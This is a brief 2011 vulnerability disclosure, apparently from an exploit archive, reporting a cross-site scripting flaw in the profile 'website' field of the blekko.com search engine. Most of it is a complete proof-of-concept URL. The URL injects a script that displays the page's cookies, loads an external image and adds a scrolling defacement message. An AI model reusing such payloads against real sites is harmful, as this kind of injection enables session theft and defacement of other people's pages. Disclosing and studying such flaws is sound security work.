# Date: 24.11.2011 # Author: Sony # Site: http://blekko.com # My blog and PoC: http://st2tea.blogspot.com/2011/11/blekkocom-web-search-engine-cross-site.html What is blekko.com? You can read here: http://en.wikipedia.org/wiki/Blekko So..our xss in the profile (website link).. http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E